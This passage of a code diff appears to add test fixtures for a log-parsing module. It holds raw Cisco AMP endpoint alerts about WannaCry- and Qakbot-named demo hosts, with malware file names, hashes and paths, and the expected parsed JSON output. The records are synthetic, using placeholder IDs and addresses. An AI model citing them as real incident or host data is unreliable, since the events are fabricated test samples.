Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275399255031905","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":2708,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":172000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275399255031904","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419275394960064599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":423000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064597","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":377000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064596","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":33000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064594","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":907000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064606","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":907000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064605","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":907000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064607","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":891000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064604","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":876000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064603","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":845000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064602","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":798000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064601","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":767000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064598","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":751000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064600","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":735000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":423000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064597","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"process_id":6404,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":377000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064596","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} \ No newline at end of file diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp4.ndjson.log-expected.json b/x-pack/filebeat/module/cisco/amp/test/cisco_amp4.ndjson.log-expected.json new file mode 100644 index 000000000000..fb066a1b3377 --- /dev/null +++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp4.ndjson.log-expected.json 
@@ -0,0 +1,3294 @@ +[ + { + "@timestamp": "2021-01-14T21:17:16.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "38:1e:eb:ba:2c:15" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.6A37D750F0-100.SBX.TG", + "cisco.amp.detection_id": "6508397899087347713", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "38:1e:eb:ba:2c:15" + ], + "cisco.amp.timestamp_nanoseconds": 295927133, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6508397899087348000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.md5": "41476df3138717868118d8542cf3d1d6", + "file.hash.sha1": "5ca4bef8de6def53519d4b22632675bb4c1e470b", + "file.hash.sha256": "6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86", + "file.name": "resume.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\Desktop\\resume.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP", + "host.name": "Demo_AMP", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 0, + "related.hash": [ + "6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86", + "41476df3138717868118d8542cf3d1d6", + "5ca4bef8de6def53519d4b22632675bb4c1e470b" + ], + "related.hosts": [ + "Demo_AMP" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T20:38:26.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + 
"cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.E4FCCBFA69-95.SBX.TG", + "cisco.amp.event_type_id": 1107296272, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 844899579, + "event.action": "Executed malware", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 14930696955218, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "event.start": "2021-01-14T20:38:26.000Z", + "file.hash.sha256": "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "input.type": "log", + "log.offset": 1313, + "process.hash.sha256": "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014", + "related.hash": [ + "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T20:18:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6412680266518626319", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" 
+ ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 587000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412680266518626000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "input.type": "log", + "log.offset": 2612, + "related.hash": [ + "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T20:18:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6412680266518626317", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 494000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412680266518626000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014", + "fileset.name": "amp", + 